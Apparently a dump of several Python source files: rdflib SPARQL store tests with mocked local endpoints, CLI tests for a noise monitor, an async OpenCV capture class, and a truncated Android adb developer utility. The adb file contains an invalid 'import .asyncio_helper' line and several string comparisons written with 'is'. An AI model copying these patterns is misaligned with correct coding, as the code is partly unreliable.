assert len(ns) > 0, ns
def tearDown(self):
self.graph.close()
def test_Query(self):
query = "select distinct ?Concept where {[] a ?Concept} LIMIT 1"
_query = SPARQLConnector.query
with patch("rdflib.plugins.stores.sparqlstore.SPARQLConnector.query") as mock:
SPARQLConnector.query.side_effect = lambda *args, **kwargs: _query(
self.graph.store, *args, **kwargs
)
res = helper.query_with_retry(self.graph, query, initNs={})
count = 0
for i in res:
count += 1
assert type(i[0]) == URIRef, i[0].n3()
assert count > 0
mock.assert_called_once()
args, kwargs = mock.call_args
def unpacker(query, default_graph=None, named_graph=None):
return query, default_graph, named_graph
(mquery, _, _) = unpacker(*args, *kwargs)
for _, uri in self.graph.namespaces():
assert mquery.count(f"<{uri}>") == 1
def test_initNs(self):
query = """\
SELECT ?label WHERE
{ ?s a xyzzy:Concept ; xyzzy:prefLabel ?label . } LIMIT 10
"""
res = helper.query_with_retry(self.graph,
query, initNs={"xyzzy": "http://www.w3.org/2004/02/skos/core#"}
)
for i in res:
assert type(i[0]) == Literal, i[0].n3()
def test_noinitNs(self):
query = """\
SELECT ?label WHERE
{ ?s a xyzzy:Concept ; xyzzy:prefLabel ?label . } LIMIT 10
"""
self.assertRaises(ValueError, self.graph.query, query)
def test_query_with_added_prolog(self):
prologue = """\
PREFIX xyzzy: <http://www.w3.org/2004/02/skos/core#>
"""
query = """\
SELECT ?label WHERE
{ ?s a xyzzy:Concept ; xyzzy:prefLabel ?label . } LIMIT 10
"""
res = helper.query_with_retry(self.graph, prologue + query)
for i in res:
assert type(i[0]) == Literal, i[0].n3()
def test_query_with_added_rdf_prolog(self):
prologue = """\
PREFIX rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#>
PREFIX xyzzy: <http://www.w3.org/2004/02/skos/core#>
"""
query = """\
SELECT ?label WHERE
{ ?s a xyzzy:Concept ; xyzzy:prefLabel ?label . } LIMIT 10
"""
res = helper.query_with_retry(self.graph, prologue + query)
for i in res:
assert type(i[0]) == Literal, i[0].n3()
def test_counting_graph_and_store_queries(self):
query = """
SELECT ?s
WHERE {
?s ?p ?o .
}
LIMIT 5
"""
g = Graph("SPARQLStore")
g.open(self.path)
count = 0
result = helper.query_with_retry(g, query)
for _ in result:
count += 1
assert count == 5, "Graph(\"SPARQLStore\") didn't return 5 records"
from rdflib.plugins.stores.sparqlstore import SPARQLStore
st = SPARQLStore(query_endpoint=self.path)
count = 0
result = helper.query_with_retry(st, query)
for _ in result:
count += 1
assert count == 5, "SPARQLStore() didn't return 5 records"
class SPARQLStoreUpdateTestCase(unittest.TestCase):
def setUp(self):
port = self.setup_mocked_endpoint()
self.graph = Graph(store="SPARQLUpdateStore", identifier=URIRef("urn:ex"))
self.graph.open(
(
"http://localhost:{port}/query".format(port=port),
"http://localhost:{port}/update".format(port=port),
),
create=False,
)
ns = list(self.graph.namespaces())
assert len(ns) > 0, ns
def setup_mocked_endpoint(self):
# Configure mock server.
s = socket.socket(socket.AF_INET, type=socket.SOCK_STREAM)
s.bind(("localhost", 0))
address, port = s.getsockname()
s.close()
mock_server = HTTPServer(("localhost", port), SPARQL11ProtocolStoreMock)
# Start running mock server in a separate thread.
# Daemon threads automatically shut down when the main process exits.
mock_server_thread = Thread(target=mock_server.serve_forever)
mock_server_thread.setDaemon(True)
mock_server_thread.start()
print(
"Started mocked sparql endpoint on http://localhost:{port}/".format(
port=port
)
)
return port
def tearDown(self):
self.graph.close()
def test_Query(self):
query = "insert data {<urn:s> <urn:p> <urn:o>}"
res = self.graph.update(query)
print(res)
class SPARQL11ProtocolStoreMock(BaseHTTPRequestHandler):
def do_POST(self):
"""
If the body should be analysed as well, just use:
```
body = self.rfile.read(int(self.headers['Content-Length'])).decode()
print(body)
```
"""
contenttype = self.headers.get("Content-Type")
if self.path == "/query" or self.path == "/query?":
if self.headers.get("Content-Type") == "application/sparql-query":
pass
elif (
self.headers.get("Content-Type") == "application/x-www-form-urlencoded"
):
pass
else:
self.send_response(406, "Not Acceptable")
self.end_headers()
elif self.path == "/update" or self.path == "/update?":
if self.headers.get("Content-Type") == "application/sparql-update":
pass
elif (
self.headers.get("Content-Type") == "application/x-www-form-urlencoded"
):
pass
else:
self.send_response(406, "Not Acceptable")
self.end_headers()
else:
print("self.path")
print(self.path)
self.send_response(404, "Not Found")
self.end_headers()
self.send_response(200, "OK")
self.end_headers()
return
def do_GET(self):
# Process an HTTP GET request and return a response with an HTTP 200 status.
self.send_response(200, "OK")
self.end_headers()
return
class SPARQLMockTests(unittest.TestCase):
def test_query(self):
httpmock = SimpleHTTPMock()
triples = {
(RDFS.Resource, RDF.type, RDFS.Class),
(RDFS.Resource, RDFS.isDefinedBy, URIRef(RDFS)),
(RDFS.Resource, RDFS.label, Literal("Resource")),
(RDFS.Resource, RDFS.comment, Literal("The class resource, everything.")),
}
rows = "\n".join([f'"{s}","{p}","{o}"' for s, p, o in triples])
response_body = f"s,p,o\n{rows}".encode()
response = MockHTTPResponse(
200, "OK", response_body, {"Content-Type": ["text/csv; charset=utf-8"]}
)
httpmock.do_get_responses.append(response)
graph = Graph(store="SPARQLStore", identifier="http://example.com")
graph.bind("xsd", XSD)
graph.bind("xml", XMLNS)
graph.bind("foaf", FOAF)
graph.bind("rdf", RDF)
assert len(list(graph.namespaces())) >= 4
with ctx_http_server(httpmock.Handler) as server:
(host, port) = server.server_address
url = f"http://{host}:{port}/query"
graph.open(url)
query_result = graph.query("SELECT ?s ?p ?o WHERE { ?s ?p ?o }")
rows = set(query_result)
assert len(rows) == len(triples)
for triple in triples:
assert triple in rows
httpmock.do_get_mock.assert_called_once()
assert len(httpmock.do_get_requests) == 1
request = httpmock.do_get_requests.pop()
assert len(request.path_query["query"]) == 1
query = request.path_query["query"][0]
for _, uri in graph.namespaces():
assert query.count(f"<{uri}>") == 1
if __name__ == "__main__":
unittest.main()
|
test.py
|
import unittest
import os
import subprocess
import sys
import ast
import noise_observer as no
from utils import *
from config_manager import ConfigManager
from threading import Thread
class TestCli(unittest.TestCase):
"""
Tests used to test command line interface.
Tests are based on the execution of a new run-time generated python script
that will use command line interface and print resulting dictionary with flags
on a file.
"""
def setUp(self):
# Creates scripts for cli testing.
create_run_script(".test_calibrate.py", ".test_calibrate.txt")
create_run_script(".test_seconds.py", ".test_seconds.txt")
create_run_script(".test_log.py", ".test_log.txt")
create_run_script(".test_record.py", ".test_record.txt")
def test_calibrate(self):
"""
Test of calibrate flag.
"""
res = subprocess.run([sys.executable, ".test_calibrate.py", "--calibrate"])
with open(".test_calibrate.txt", "r") as f:
kargs = ast.literal_eval(f.read())
self.assertEqual(kargs['calibrate'], True)
os.remove(".test_calibrate.txt")
def test_record(self):
"""
Test of record flag.
"""
record_thr = 100
res = subprocess.run([sys.executable, ".test_record.py", "--record", str(record_thr)])
with open(".test_record.txt", "r") as f:
kargs = ast.literal_eval(f.read())
self.assertEqual(kargs['record'], record_thr)
os.remove(".test_record.txt")
def test_seconds(self):
"""
Test of seconds flag.
"""
sec = 5
res = subprocess.run([sys.executable, ".test_seconds.py", "--seconds", str(sec)])
with open(".test_seconds.txt", "r") as f:
kargs = ast.literal_eval(f.read())
self.assertEqual(kargs['seconds'], sec)
os.remove(".test_seconds.txt")
def test_log(self):
"""
Test of log flag.
"""
log_file = ".log.log"
res = subprocess.run([sys.executable, ".test_log.py", "--log", log_file])
self.assertEqual(os.path.exists(log_file), True)
os.remove(".test_log.txt")
os.remove(log_file)
def tearDown(self):
os.remove(".test_seconds.py")
os.remove(".test_calibrate.py")
os.remove(".test_log.py")
os.remove(".test_record.py")
class TestConfig(unittest.TestCase):
"""
Test of config file reading and writing of index.
"""
def test_setindex(self):
"""
Test of setindex flag and correct update of configuration file.
"""
index = 0
res = subprocess.run([sys.executable, "inspect_noise.py", "--setindex", str(index)])
cnf_manager = ConfigManager()
self.assertEqual(int(cnf_manager.get_config_value("input_device_index")), index)
def test_check_default_config_params(self):
"""
Test of correct setting of default params.
Change this method before
"""
default_frames = 1024
default_format = 8
default_channels = 2
default_input_device_index = 0
default_rate = 44100
default_audio_seg_length = 1
config = ConfigManager()
self.assertEqual(int(config.get_config_value("input_device_index")), default_input_device_index)
self.assertEqual(int(config.get_config_value("frames_per_buffer")), default_frames)
self.assertEqual(int(config.get_config_value("channels")), default_channels)
self.assertEqual(int(config.get_config_value("format")), default_format)
self.assertEqual(int(config.get_config_value("rate")), default_rate)
self.assertEqual(float(config.get_config_value("audio_segment_length")), default_audio_seg_length)
class NoiseObserver(unittest.TestCase):
"""
Test noise observer main loop.
"""
def setUp(self):
# Creates scripts for cli testing.
create_run_script(".test_monitoring.py", ".test_monitoring.txt")
def test_monitoring(self):
"""
Test if the monitoring starts.
"""
# Create runnable script.
# This script is used to create dictionary using cli.
res = subprocess.run([sys.executable, ".test_monitoring.py", "--trashesoutput"])
with open(".test_monitoring.txt", "r") as f:
kargs = ast.literal_eval(f.read())
# Passing cli as parameter.
del kargs["calibrate"]
del kargs["showindex"]
del kargs["setindex"]
# Used thread to start monitoring in separated flow.
noise_obs = no.NoiseObserver(**kargs)
thread = Thread(target=noise_obs.start_monitoring)
thread.start()
self.assertTrue(noise_obs.is_monitoring())
noise_obs.stop_monitoring()
thread.join() # Wait until thread terminate work
self.assertFalse(noise_obs.is_monitoring())
os.remove(".test_monitoring.txt")
def tearDown(self):
os.remove(".test_monitoring.py")
if __name__ == '__main__':
unittest.main()
|
videocaptureasync.py
|
# https://github.com/gilbertfrancois/video-capture-async
import threading
import cv2
import time
WARMUP_TIMEOUT = 10.0
class VideoCaptureAsync:
def __init__(self, src=0, width=640, height=480):
self.src = src
self.cap = cv2.VideoCapture(self.src)
if not self.cap.isOpened():
raise RuntimeError("Cannot open camera. Try to choose other CAMID in './scripts/settings.sh'")
self.cap.set(cv2.CAP_PROP_FRAME_WIDTH, width)
self.cap.set(cv2.CAP_PROP_FRAME_HEIGHT, height)
self.grabbed, self.frame = self.cap.read()
self.started = False
self.read_lock = threading.Lock()
def set(self, var1, var2):
self.cap.set(var1, var2)
def isOpened(self):
return self.cap.isOpened()
def start(self):
if self.started:
print('[!] Asynchronous video capturing has already been started.')
return None
self.started = True
self.thread = threading.Thread(target=self.update, args=(), daemon=True)
self.thread.start()
# (warmup) wait for the first successfully grabbed frame
warmup_start_time = time.time()
while not self.grabbed:
warmup_elapsed_time = (time.time() - warmup_start_time)
if warmup_elapsed_time > WARMUP_TIMEOUT:
raise RuntimeError(f"Failed to succesfully grab frame from the camera (timeout={WARMUP_TIMEOUT}s). Try to restart.")
time.sleep(0.5)
return self
def update(self):
while self.started:
grabbed, frame = self.cap.read()
with self.read_lock:
self.grabbed = grabbed
self.frame = frame
def read(self):
with self.read_lock:
frame = self.frame.copy()
grabbed = self.grabbed
return grabbed, frame
def stop(self):
self.started = False
self.thread.join()
def __exit__(self, exec_type, exc_value, traceback):
self.cap.release()
|
adb_enhanced.py
|
#!/usr/bin/python
# Python 2 and 3, print compatibility
from __future__ import absolute_import, print_function
# Without this urllib.parse which is python 3 only cannot be accessed in python 2.
from future.standard_library import install_aliases
install_aliases()
import psutil
import re
import signal
import subprocess
import sys
import tempfile
import threading
import time
import os
import random
# This is required only for Python 2
# pylint: disable=import-error
from urllib.parse import urlparse
# asyncio was introduced in version 3.5
if sys.version_info >= (3, 5):
try:
import .asyncio_helper
_ASYNCIO_AVAILABLE = True
except ImportError:
# This is to deal with python versions below 3.5
_ASYNCIO_AVAILABLE = False
else:
_ASYNCIO_AVAILABLE = False
try:
# This fails when the code is executed directly and not as a part of python package installation,
# I definitely need a better way to handle this.
from adbe.adb_helper import (get_adb_shell_property, execute_adb_command2, execute_adb_shell_command,
execute_adb_shell_command2, execute_file_related_adb_shell_command, get_package,
root_required_to_access_file, get_device_android_api_version)
from adbe.output_helper import print_message, print_error, print_error_and_exit, print_verbose
except ImportError:
# This works when the code is executed directly.
from adb_helper import (get_adb_shell_property, execute_adb_command2, execute_adb_shell_command,
execute_adb_shell_command2, execute_file_related_adb_shell_command, get_package,
root_required_to_access_file, get_device_android_api_version)
from output_helper import print_message, print_error, print_error_and_exit, print_verbose
_KEYCODE_BACK = 4
_MIN_API_FOR_RUNTIME_PERMISSIONS = 23
# Value to be return as 'on' to the user
_USER_PRINT_VALUE_ON = 'on'
# Value to be return as 'partially on' to the user
_USER_PRINT_VALUE_PARTIALLY_ON = 'partially on'
# Value to be return as 'off' to the user
_USER_PRINT_VALUE_OFF = 'off'
# Value to be return as 'unknown' to the user
_USER_PRINT_VALUE_UNKNOWN = 'unknown'
def _ensure_package_exists(package_name):
"""
Don't call this directly. Instead consider decorating your method with
@ensure_package_exists or @ensure_package_exists2
:return: True if package_name package is installed on the device
"""
if not _package_exists(package_name):
print_error_and_exit("Package %s does not exist" % package_name)
# A decorator to ensure package exists
def ensure_package_exists(func):
def func_wrapper(package_name):
_ensure_package_exists(package_name)
return func(package_name)
return func_wrapper
# A decorator to ensure package exists with one more argument
def ensure_package_exists2(func):
def func_wrapper(package_name, arg2):
_ensure_package_exists(package_name)
return func(package_name, arg2)
return func_wrapper
# A decorator to ensure package exists with two more arguments
def ensure_package_exists3(func):
def func_wrapper(package_name, arg2, arg3):
_ensure_package_exists(package_name)
return func(package_name, arg2, arg3)
return func_wrapper
def _package_exists(package_name):
cmd = 'pm path %s' % package_name
return_code, response, _ = execute_adb_shell_command2(cmd)
return return_code == 0 and response is not None and len(response.strip()) != 0
# Source:
# https://github.com/dhelleberg/android-scripts/blob/master/src/devtools.groovy
def handle_gfx(value):
if value == 'on':
cmd = 'setprop debug.hwui.profile visual_bars'
elif value == 'off':
cmd = 'setprop debug.hwui.profile false'
elif value == 'lines':
cmd = 'setprop debug.hwui.profile visual_lines'
else:
print_error_and_exit('Unexpected value for gfx %s' % value)
return
execute_adb_shell_command_and_poke_activity_service(cmd)
# Source: https://github.com/dhelleberg/android-scripts/blob/master/src/devtools.groovy
# https://plus.google.com/+AladinQ/posts/dpidzto1b8B
def handle_overdraw(value):
version = get_device_android_api_version()
if version < 19:
if value is 'on':
cmd = 'setprop debug.hwui.show_overdraw true'
elif value is 'off':
cmd = 'setprop debug.hwui.show_overdraw false'
elif value is 'deut':
print_error_and_exit(
'deut mode is available only on API 19 and above, your Android API version is %d' % version)
return
else:
print_error_and_exit('Unexpected value for overdraw %s' % value)
return
else:
if value is 'on':
cmd = 'setprop debug.hwui.overdraw show'
elif value is 'off':
cmd = 'setprop debug.hwui.overdraw false'
elif value is 'deut':
cmd = 'setprop debug.hwui.overdraw show_deuteranomaly'
else:
print_error_and_exit('Unexpected value for overdraw %s' % value)
return
execute_adb_shell_command_and_poke_activity_service(cmd)
# Perform screen rotation. Accepts four direction types - left, right, portrait, and landscape.
# Source:
# https://stackoverflow.com/questions/25864385/changing-android-device-orientation-with-adb
def handle_rotate(direction):
disable_acceleration = 'put system accelerometer_rotation 0'
execute_adb_shell_settings_command(disable_acceleration)
if direction is 'portrait':
new_direction = 0
elif direction is 'landscape':
new_direction = 1
elif direction is 'left':
current_direction = get_current_rotation_direction()
print_verbose("Current direction: %s" % current_direction)
if current_direction is None:
return
new_direction = (current_direction + 1) % 4
elif direction is 'right':
current_direction = get_current_rotation_direction()
print_verbose("Current direction: %s" % current_direction)
if current_direction is None:
return
new_direction = (current_direction - 1) % 4
else:
print_error_and_exit('Unexpected direction %s' % direction)
return
cmd = 'put system user_rotation %s' % new_direction
execute_adb_shell_settings_command(cmd)
def get_current_rotation_direction():
cmd = 'get system user_rotation'
direction = execute_adb_shell_settings_command(cmd)
print_verbose("Return value is %s" % direction)
if not direction or direction == 'null':
return 0 # default direction is 0, vertical straight
try:
return int(direction)
except ValueError as e:
print_error("Failed to get direction, error: \"%s\"" % e)
def handle_layout(value):
if value:
cmd = 'setprop debug.layout true'
else:
cmd = 'setprop debug.layout false'
execute_adb_shell_command_and_poke_activity_service(cmd)
# Source: https://stackoverflow.com/questions/10506591/turning-airplane-mode-on-via-adb
# This is incomplete
def handle_airplane(turn_on):
if turn_on:
cmd = 'put global airplane_mode_on 1'
else:
cmd = 'put global airplane_mode_on 0'
# At some version, this became a protected intent, so, it might require root to succeed.
broadcast_change_cmd = 'am broadcast -a android.intent.action.AIRPLANE_MODE'
# This is a protected intent which would require root to run
# https://developer.android.com/reference/android/content/Intent.html#ACTION_AIRPLANE_MODE_CHANGED
broadcast_change_cmd = 'su root %s' % broadcast_change_cmd
execute_adb_shell_settings_command2(cmd)
return_code, _, _ = execute_adb_shell_command2(broadcast_change_cmd)
if return_code != 0:
print_error_and_exit('Failed to change airplane mode')
else:
print_message('Airplane mode changed successfully')
def get_battery_saver_state():
_error_if_min_version_less_than(19)
cmd = 'get global low_power'
return_code, stdout, _ = execute_adb_shell_settings_command2(cmd)
if return_code != 0:
print_error('Failed to get battery saver state')
return _USER_PRINT_VALUE_UNKNOWN
if stdout.strip() == 'null':
return _USER_PRINT_VALUE_OFF
state = 0
try:
state = int(stdout.strip())
except ValueError:
print_error('Unable to get int value from "%s"' % stdout.strip())
return _USER_PRINT_VALUE_UNKNOWN
if state == 0:
return _USER_PRINT_VALUE_OFF
else:
return _USER_PRINT_VALUE_ON
# Source:
# https://stackoverflow.com/questions/28234502/programmatically-enable-disable-battery-saver-mode
def handle_battery_saver(turn_on):
_error_if_min_version_less_than(19)
if turn_on:
cmd = 'put global low_power 1'
else:
cmd = 'put global low_power 0'
if turn_on:
return_code, _, _ = execute_adb_shell_command2(get_battery_unplug_cmd())
if return_code != 0:
print_error_and_exit('Failed to unplug battery')
return_code, _, _ = execute_adb_shell_command2(get_battery_discharging_cmd())
if return_code != 0:
print_error_and_exit('Failed to put battery in discharge mode')
return_code, _, _ = execute_adb_shell_settings_command2(cmd)
if return_code != 0:
print_error_and_exit('Failed to modify battery saver mode')
# Source:
# https://stackoverflow.com/questions/28234502/programmatically-enable-disable-battery-saver-mode
def handle_battery_level(level):
_error_if_min_version_less_than(19)
if level < 0 or level > 100:
print_error_and_exit(
'Battery percentage %d is outside the valid range of 0 to 100' %
level)
cmd = 'dumpsys battery set level %d' % level
execute_adb_shell_command2(get_battery_unplug_cmd())
execute_adb_shell_command2(get_battery_discharging_cmd())
execute_adb_shell_command2(cmd)
# Source:
# https://stackoverflow.com/questions/28234502/programmatically-enable-disable-battery-saver-mode
def handle_battery_reset():
# The battery related commands fail silently on API 16. I am not sure about 17 and 18.
_error_if_min_version_less_than(19)
cmd = get_battery_reset_cmd()
execute_adb_shell_command2(cmd)
# https://developer.android.com/training/monitoring-device-state/doze-standby.html
def handle_doze(turn_on):
_error_if_min_version_less_than(23)
enable_idle_mode_cmd = 'dumpsys deviceidle enable'
if turn_on:
# Source: https://stackoverflow.com/a/42440619
cmd = 'dumpsys deviceidle force-idle'
execute_adb_shell_command2(get_battery_unplug_cmd())
execute_adb_shell_command2(get_battery_discharging_cmd())
execute_adb_shell_command2(enable_idle_mode_cmd)
execute_adb_shell_command2(cmd)
else:
cmd = 'dumpsys deviceidle unforce'
execute_adb_shell_command2(get_battery_reset_cmd())
execute_adb_shell_command2(enable_idle_mode_cmd)
execute_adb_shell_command2(cmd)
# Source: https://github.com/dhelleberg/android-scripts/blob/master/src/devtools.groovy
# Ref:
# https://gitlab.com/SaberMod/pa-android-frameworks-base/commit/a53de0629f3b94472c0f160f5bbe1090b020feab
def get_update_activity_service_cmd():
# Note: 1599295570 == ('_' << 24) | ('S' << 16) | ('P' << 8) | 'R'
return 'service call activity 1599295570'
# This command puts the battery in discharging mode (most likely this is
# Android 6.0 onwards only)
def get_battery_discharging_cmd():
return 'dumpsys battery set status 3'
def get_battery_unplug_cmd():
return 'dumpsys battery unplug'
def get_battery_reset_cmd():
return 'dumpsys battery reset'
@ensure_package_exists
def handle_get_jank(app_name):
running = _is_app_running(app_name)
if not running:
# Jank information cannot be fetched unless the app is running
print_verbose('Starting the app %s to get its jank information' % app_name)
launch_app(app_name)
try:
cmd = 'dumpsys gfxinfo %s ' % app_name
return_code, result, _ = execute_adb_shell_command2(cmd)
print_verbose(result)
found = False
if return_code == 0:
for line in result.split('\n'):
if line.find('Janky') != -1:
print(line)
found = True
break
if not found:
print_error('No jank information found for %s' % app_name)
finally:
# If app was not running then kill app after getting the jank information.
if not running:
print_verbose('Stopping the app %s after getting its jank information' % app_name)
force_stop(app_name)
def _is_app_running(app_name):
return_code, result, _ = execute_adb_shell_command2('ps -o NAME')
if return_code != 0 or not result:
return False
result = result.strip()
return result.find(app_name) != -1
def handle_list_devices():
cmd = 'devices -l'
return_code, stdout, stderr = execute_adb_command2(cmd)
if return_code != 0:
print_error_and_exit('Failed to execute command %s, error: %s ' % (cmd, stderr))
# Skip the first line, it says "List of devices attached"
device_infos = stdout.split('\n')[1:]
if len(device_infos) == 0 or (
len(device_infos) == 1 and len(device_infos[0]) == 0):
print_error_and_exit('No attached Android device found')
elif len(device_infos) == 1:
_print_device_info()
else:
for device_info in device_infos:
if len(device_info) == 0:
continue
device_serial = device_info.split()[0]
if 'unauthorized' in device_info:
device_info = ' '.join(device_info.split()[1:])
print_error(
('Unlock Device "%s" and give USB debugging access to ' +
'this PC/Laptop by unlocking and reconnecting ' +
'the device. More info about this device: "%s"\n') % (
device_serial, device_info))
else:
_print_device_info(device_serial)
def _print_device_info(device_serial=None):
manufacturer = get_adb_shell_property('ro.product.manufacturer', device_serial=device_serial)
model = get_adb_shell_property('ro.product.model', device_serial=device_serial)
# This worked on 4.4.3 API 19 Moto E
display_name = get_adb_shell_property('ro.product.display', device_serial=device_serial)
# First fallback: undocumented
if display_name is None or len(display_name) == 0 or display_name == 'null':
# This works on 4.4.4 API 19 Galaxy Grand Prime
if get_device_android_api_version(device_serial=device_serial) >= 19:
display_name = execute_adb_shell_settings_command('get system device_name', device_serial=device_serial)
# Second fallback, documented to work on API 25 and above
# Source: https://developer.android.com/reference/android/provider/Settings.Global.html#DEVICE_NAME
if display_name is None or len(display_name) == 0 or display_name == 'null':
if get_device_android_api_version(device_serial=device_serial) >= 25:
display_name = execute_adb_shell_settings_command('get global device_name', device_serial=device_serial)
# ABI info
abi = get_adb_shell_property('ro.product.cpu.abi', device_serial=device_serial)
release = get_adb_shell_property('ro.build.version.release', device_serial=device_serial)
release = get_adb_shell_property('ro.build.version.release', device_serial=device_serial)
sdk = get_adb_shell_property('ro.build.version.sdk', device_serial=device_serial)
print_message(
'Serial ID: %s\nManufacturer: %s\nModel: %s (%s)\nRelease: %s\nSDK version: %s\nCPU: %s\n' %
(device_serial, manufacturer, model, display_name, release, sdk, abi))
def print_top_activity():
app_name, activity_name = _get_top_activity_data()
if app_name:
print_message('Application name: %s' % app_name)
if activity_name:
print_message('Activity name: %s' % activity_name)
def _get_top_activity_data():
cmd = 'dumpsys window windows'
return_code, output, _ = execute_adb_shell_command2(cmd)
if return_code != 0 and not output:
print_error_and_exit('Device returned no response, is it still connected?')
for line in output.split('\n'):
line = line.strip()
if line.startswith('mFocusedApp'):
regex_result = re.search(r'ActivityRecord{.* (\S+)/(\S+)', line)
if regex_result is None:
print_error('Unable to parse activity name from:')
print_error(line)
return None, None
app_name, activity_name = regex_result.group(1), regex_result.group(2)
# If activity name is a short hand then complete it.
if activity_name.startswith('.'):
activity_name = '%s%s' %(app_name, activity_name)
return app_name, activity_name
return None, None
def dump_ui(xml_file):
tmp_file = _create_tmp_file('dump-ui', 'xml')
cmd1 = 'uiautomator dump %s' % tmp_file
cmd2 = 'pull %s %s' % (tmp_file, xml_file)
cmd3 = 'rm %s' % tmp_file
print_verbose('Writing UI to %s' % tmp_file)
return_code, _, stderr = execute_adb_shell_command2(cmd1)
if return_code != 0:
print_error_and_exit('Failed to execute \"%s\", stderr: \"%s\"' % (cmd1, stderr))
print_verbose('Pulling file %s' % xml_file)
return_code, _, stderr = execute_adb_command2(cmd2)
print_verbose('Deleting file %s' % tmp_file)
execute_adb_shell_command2(cmd3)
if return_code != 0:
print_error_and_exit('Failed to fetch file %s' % tmp_file)
else:
print_message('XML UI dumped to %s, you might want to format it using \"xmllint --format %s\"' %
(xml_file, xml_file))
@ensure_package_exists
def force_stop(app_name):
cmd = 'am force-stop %s' % app_name
return_code, stdout, _ = execute_adb_shell_command2(cmd)
if return_code != 0:
print_error_and_exit('Failed to stop \"%s\"' % app_name)
else:
print_message(stdout)
@ensure_package_exists
def clear_disk_data(app_name):
cmd = 'pm clear %s' % app_name
return_code, _, _ = execute_adb_shell_command2(cmd)
if return_code != 0:
print_error_and_exit('Failed to clear data of \"%s\"' % app_name)
def get_mobile_data_state():
# Using "adb shell dumpsys telephony.registry | ag mDataConnectionState"
cmd = 'dumpsys telephony.registry'
return_code, stdout, _ = execute_adb_shell_command2(cmd)
if return_code != 0:
print_error('Failed to get mobile data setting')
return _USER_PRINT_VALUE_UNKNOWN
m = re.search(r'mDataConnectionState=(\d+)', stdout)
if not m:
print_error('Failed to get mobile data setting from "%s"' % stdout)
return _USER_PRINT_VALUE_UNKNOWN
if int(m.group(1)) == 0:
return _USER_PRINT_VALUE_OFF
else:
return _USER_PRINT_VALUE_ON
# Source:
# https://stackoverflow.com/questions/26539445/the-setmobiledataenabled-method-is-no-longer-callable-as-of-android-l-and-later
def handle_mobile_data(turn_on):
if turn_on:
cmd = 'svc data enable'
else:
cmd = 'svc data disable'
return_code, _, _ = execute_adb_shell_command2(cmd)
if return_code != 0:
print_error_and_exit('Failed to change mobile data setting')
def force_rtl(turn_on):
_error_if_min_version_less_than(19)
if turn_on:
cmd = 'put global debug.force_rtl 1'
else:
cmd = 'put global debug.force_rtl 0'
execute_adb_shell_settings_command_and_poke_activity_service(cmd)
def dump_screenshot(filepath):
screenshot_file_path_on_device = _create_tmp_file('screenshot', 'png')
dump_cmd = 'screencap -p %s ' % screenshot_file_path_on_device
return_code, stdout, stderr = execute_adb_shell_command2(dump_cmd)
if return_code != 0:
print_error_and_exit(
'Failed to capture the screenshot: (stdout: %s, stderr: %s)' % (stdout, stderr))
pull_cmd = 'pull %s %s' % (screenshot_file_path_on_device, filepath)
execute_adb_command2(pull_cmd)
del_cmd = 'rm %s' % screenshot_file_path_on_device
execute_adb_shell_command2(del_cmd)
def dump_screenrecord(filepath):
_error_if_min_version_less_than(19)
api_version = get_device_android_api_version()
# I have tested that on API 23 and above this works. Till Api 22, on emulator, it does not.
if api_version < 23 and _is_emulator():
print_error_and_exit('screenrecord is not supported on emulator below API 23\n' +
'Source: %s ' % 'https://issuetracker.google.com/issues/36982354')
screen_record_file_path_on_device = None
original_sigint_handler = None
def _start_recording():
global screen_record_file_path_on_device
print_message('Recording video, press Ctrl+C to end...')
screen_record_file_path_on_device = _create_tmp_file('screenrecord', 'mp4')
dump_cmd = 'screenrecord --verbose %s ' % screen_record_file_path_on_device
execute_adb_shell_command2(dump_cmd)
def _pull_and_delete_file_from_device():
global screen_record_file_path_on_device
print_message('Saving recording to %s' % filepath)
pull_cmd = 'pull %s %s' % (screen_record_file_path_on_device, filepath)
execute_adb_command2(pull_cmd)
del_cmd = 'rm %s' % screen_record_file_path_on_device
execute_adb_shell_command2(del_cmd)
def _kill_all_child_processes():
current_process = psutil.Process()
children = current_process.children(recursive=True)
for child in children:
print_verbose('Child process is %s' % child)
os.kill(child.pid, signal.SIGTERM)
def _handle_recording_ended():
print_message('Finishing...')
# Kill all child processes.
# This is not neat but it is OK for now since we know that we have only one adb child process which is
# running screen recording.
_kill_all_child_processes()
# Wait for one second.
time.sleep(1)
# Finish rest of the processing.
_pull_and_delete_file_from_device()
# And exit
sys.exit(0)
def signal_handler(unused_sig, unused_frame):
# Restore the original handler for Ctrl-C
signal.signal(signal.SIGINT, original_sigint_handler)
_handle_recording_ended()
original_sigint_handler = signal.getsignal(signal.SIGINT)
signal.signal(signal.SIGINT, signal_handler)
_start_recording()
def get_mobile_data_saver_state():
cmd = 'cmd netpolicy get restrict-background'
return_code, stdout, _ = execute_adb_shell_command2(cmd)
if return_code != 0:
print_error('Failed to get mobile data saver mode setting')
return _USER_PRINT_VALUE_UNKNOWN
enabled = stdout.strip().find('enabled') != -1
if enabled:
return _USER_PRINT_VALUE_ON
else:
return _USER_PRINT_VALUE_OFF
# https://developer.android.com/training/basics/network-ops/data-saver.html
def handle_mobile_data_saver(turn_on):
if turn_on:
cmd = 'cmd netpolicy set restrict-background true'
else:
cmd = 'cmd netpolicy set restrict-background false'
return_code, _, _ = execute_adb_shell_command2(cmd)
if return_code != 0:
print_error_and_exit('Failed to modify data saver mode setting')
def get_dont_keep_activities_in_background_state():
cmd = 'get global always_finish_activities'
return_code, stdout, _ = execute_adb_shell_settings_command2(cmd)
if return_code != 0:
print_error('Failed to get don\'t keep activities in the background setting')
return _USER_PRINT_VALUE_UNKNOWN
if stdout.strip() == 'null':
return _USER_PRINT_VALUE_OFF
enabled = int(stdout.strip()) != 0
if enabled:
return _USER_PRINT_VALUE_ON
else:
return _USER_PRINT_VALUE_OFF
# Ref: https://github.com/android/platform_packages_apps_settings/blob/4ce19f5c4fd40f3bedc41d3fbcbdede8b2614501/src/com/android/settings/DevelopmentSettings.java#L2123
# adb shell settings put global always_finish_activities true might not work on all Android versions.
# It was in system (not global before ICS)
# adb shell service call activity 43 i32 1 followed by that
def handle_dont_keep_activities_in_background(turn_on):
# Till Api 25, the value was True/False, above API 25, 1/0 work. Source: manual testing
use_true_false_as_value = get_device_android_api_version() <= 25
if turn_on:
value = 'true' if use_true_false_as_value else '1'
cmd1 = 'put global always_finish_activities %s' % value
cmd2 = 'service call activity 43 i32 1'
else:
value = 'false' if use_true_false_as_value else '0'
cmd1 = 'put global always_finish_activities %s' % value
cmd2 = 'service call activity 43 i32 0'
execute_adb_shell_settings_command(cmd1)
execute_adb_shell_command_and_poke_activity_service(cmd2)
def toggle_animations(turn_on):
if turn_on:
value = 1
